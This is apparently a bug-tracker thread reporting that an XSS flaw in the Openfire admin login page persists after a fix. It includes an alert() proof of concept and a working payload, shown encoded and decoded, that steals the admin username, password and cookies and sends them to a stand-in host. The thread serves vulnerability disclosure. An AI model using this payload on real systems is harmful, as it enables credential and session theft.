I am not sure the correct solution is to just strip these characters.
My understanding is that some of the characters that function strips could be valid username characters and while the likelyhood of someone using them is low, I would hate to see functionality in the program arbitrarily broken to fix this bug.

I would contribute a fix, but I am having some trouble getting eclipse to work, and since that is my editor of choice.

Fixed the XSS on the login screen.

reopening.

I looked around, but I didn't see anything more on this. It appears to be marked "fixed", but the admin console, as of version 3.6.4 is still vulnerable to XSS.

e.g.,
http://../openfire/login.jsp?url=%2Findex.jsp&login=&username=%22%20onclick=%22alert(%27xss%27)&password=

Hello guys

I'm affraid this issue was not completelly fixed. The problem still exists for "url" parameter and the fix implementation for "username" parameter is failed since a XSS attack without less-than-character,
like the following, is still working. The followgin attack imnplements a small function to steel admin credentials and send them to a (ficticious) malicious site, it is fully functional:
http://JiveServer:9090/login.jsp?username=%22+onchange%3D%27document.loginForm.onsubmit%3Drobit%3Bfunction+robit%28%29+%7Bvar+image%3Bimage+%3D+new+Image%28%29%3Bimage.src+%3D+%22http%3A%2F%2Fwww.malicioussite.com%2FGet.asp%3FUsuario%3D%22+%2B+loginForm.username.value+%2B+%22%26Password%3D%22+%2B+loginForm.password.value+%2B+%22%26cookies%3D%22+%2B+document.cookie%7D%27+me%3D%22

URL decoded
http://JiveServer:9090/login.jsp?username=" onchange='document.loginForm.onsubmit=robit;function robit() {var image;image = new Image();image.src = "http://www.malicioussite.com/Get.asp?Usuario=" + loginForm.username.value + "&Password=" + loginForm.password.value + "&cookies=" + document.cookie}' me="

Please check the following resource for more information of different possible attacks.
http://ha.ckers.org/xss.html

Regards,
JC